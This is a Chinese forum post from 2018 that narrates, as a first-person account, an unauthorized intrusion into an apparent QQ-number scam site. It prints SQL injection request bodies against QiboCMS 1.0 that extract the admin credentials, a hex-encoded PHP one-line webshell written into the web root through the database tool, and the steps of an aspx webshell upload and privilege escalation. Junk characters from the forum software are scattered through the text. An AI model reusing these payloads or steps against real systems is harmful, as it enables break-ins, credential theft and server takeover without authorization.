找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1447|回复: 0
打印 上一主题 下一主题

入侵卖靓号QQ骗子网站服务器纪实

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:08:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 I, L. u' d) |+ X; V
5 {2 c' L9 E; ]8 b

. m( Y7 W- U% k! B1 M. M

& \7 x' y/ ^4 s- L$ w 一、踩点寻找漏洞
( S* v# P* C4 d8 k4 q
闲来无事,在各个QQ靓号群求买5QQ,寻问半天无果就在百度搜索5QQ扫号找到目标www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
0 ]8 V% z* e2 Y# i! v6 z1 J: o5 ]
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
8 ^& ?6 f8 e# {0 w5 m$ ]" O+ q* _ Z/ d z
先注册一个用户,记住注册时候的邮箱以uid号,
8 n8 H9 a, |8 t
3-1.png
! f0 I/ J$ b8 C, q( t# Y
3-2.png
3 R3 J& S5 q* p1 A S- m6 B
然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
# {0 G# _$ ?2 X1 L3 v
5 r* u& l- R: s4 S' _+ D6 r" z truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
W& x1 L7 k/ \$ I0 D7 c4 m5 N, X
这里的emailuid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
, H) I9 P- p6 a( u% Y* |5 ^
3-3.png
6 m# H$ I9 h8 \0 |) E% s
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
1 F( i3 f) x" {
3-4.png
+ [; U0 J ]. x* Y7 f( a& e4 J+ K
3 E1 N8 {5 j; ]$ m
解密进后台如图:
5 ^$ x' U! j- X8 |6 s; }. ]
3-5.png
& h r% [8 \, I3 D$ E/ V
2 ?/ _3 w- i* }5 O o
$ R; A1 [2 S/ F% |- u0 y4 @
二、后台getwebshell        
9 D) I! Z; _. ^( O) H3 b* t
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
5 l7 W8 ^+ I0 H* h
- v: `5 y0 z) A# |$ U: ^) o
3-6.png
- }' ?0 T& ?5 `
r, v/ m7 Z( R% Z) V5 D
然后点确定,添加提示
2 C2 a% H' g# m# V0 @5 _; M5 `
+ r* H. N& I/ H D
3-7.png
* B3 W$ u! |: V) ?! ~( g
8 `# b9 F4 _6 T. K- j) ]
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
5 D" ]1 u4 J k0 U
& C- x& X2 j( d1 Z" o
3-8.png
% o+ A" B; I. p# }5 q7 B6 E) _; s
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
8 C8 Q6 s. s1 }7 |
如图:
8 z! N+ E7 l6 m
3-9.png
- V& M$ S4 a0 Q/ O3 o. c
3-10.png
5 `* h2 d% t4 `' w% L, o
0 c* J4 Z t& w* a' K& g9 l
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
! x6 `' b( f4 m, h
! ? L$ W+ _4 ^( a0 G
3-11.png
; x3 |, ~- U7 c5 R) R
& ~* g4 J: e& h9 B
三、提权进服务器
# W! x3 }3 n0 C4 d1 [7 \- g8 D
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
0 p, K2 N6 Y* m, v4 A
3-12.png
7 p( H, ?0 W2 e, \5 u- Z z/ l
; T. [) N' h# e n, z* Q
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
0 g0 v4 z3 `3 D0 o3 t8 O9 F: J; ]
3-13.png
9 \7 T/ b/ V# k1 V- a/ p2 u0 K" X. J
, ?/ D; D, P* I+ a6 \9 i' A6 E+ Z
然后登陆服务器如图:
8 i8 Z J4 y+ H6 C
6 \8 h+ h8 |4 c- ^ L) |
3-14.png ( Y" [/ Y2 y3 F6 ?: T

: @- P# i3 T" w3 n$ I

" `$ }; i4 k& t' j5 P$ ?
) F* X* e5 V/ i6 A# Q) V+ z
难怪普通刀连接不上,原来是有狗。
$ r: k4 z& p5 `: Y3 K
' _- _ a( N6 Y5 n
* e2 N' }. w+ C& N6 M8 o# I* ^
# Q: L4 p1 h; s

" ^$ c6 t9 v/ `: G

# \8 {) w! C9 O7 R2 G# Q$ v/ q
0 D' j4 k+ N, ^( Z

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表